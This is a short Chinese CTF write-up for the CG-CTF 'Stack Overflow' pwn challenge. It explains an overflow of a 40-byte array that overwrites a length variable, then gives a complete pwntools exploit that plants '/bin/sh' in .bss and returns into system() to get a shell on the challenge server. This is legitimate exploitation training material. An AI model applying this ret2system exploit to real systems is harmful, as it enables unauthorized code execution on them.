CG-CTF Stack Overflow（pwn）

首先先拿到ida里面看一下，找一下溢出点

点进去A发现是一个大小为40的数组（0x28），但是可以接受64个字符，所以这里是第一个溢出点。
下面是对s进行输入，限制是n，点开n会发现n就在A的下面。

所以思路就是：我们可以通过溢出A来达到覆盖n的效果

然后我们点开pwnme函数会发现system函数，搜索字符串发现没有‘/bin/sh’，所以需要我们自己写入bss段。
exp：

from pwn import *

#p = process('./cgpwna')
p = remote('182.254.217.142',10001)
elf = ELF('./cgpwna')

p.recvuntil('your choice:')
p.sendline('1')

payload1 = 'a'*0x28 + '/bin/sh'
p.recvuntil("you can leave some message here:")
p.sendline(payload1)

system_addr = elf.symbols['system']

payload2 = 'a'*0x34 + p32(system_addr) + p32(0xdeadbeef) + p32(0x0804A0A8)
p.recvuntil("your name please:")
p.sendline(payload2)

p.interactive()

解释一下exp：
payload1是负责通过溢出A将/bin/sh写入bss段的
payload2中‘a'*0x34是输入的s到返回地址的距离
然后后面的参数是system函数的地址
再后面的0xdeadbeef是system函数的返回地址，这里随便写就可以
最后的是‘/bin/sh’的地址，也就是n的地址
最后exp就构造完成了 get flag！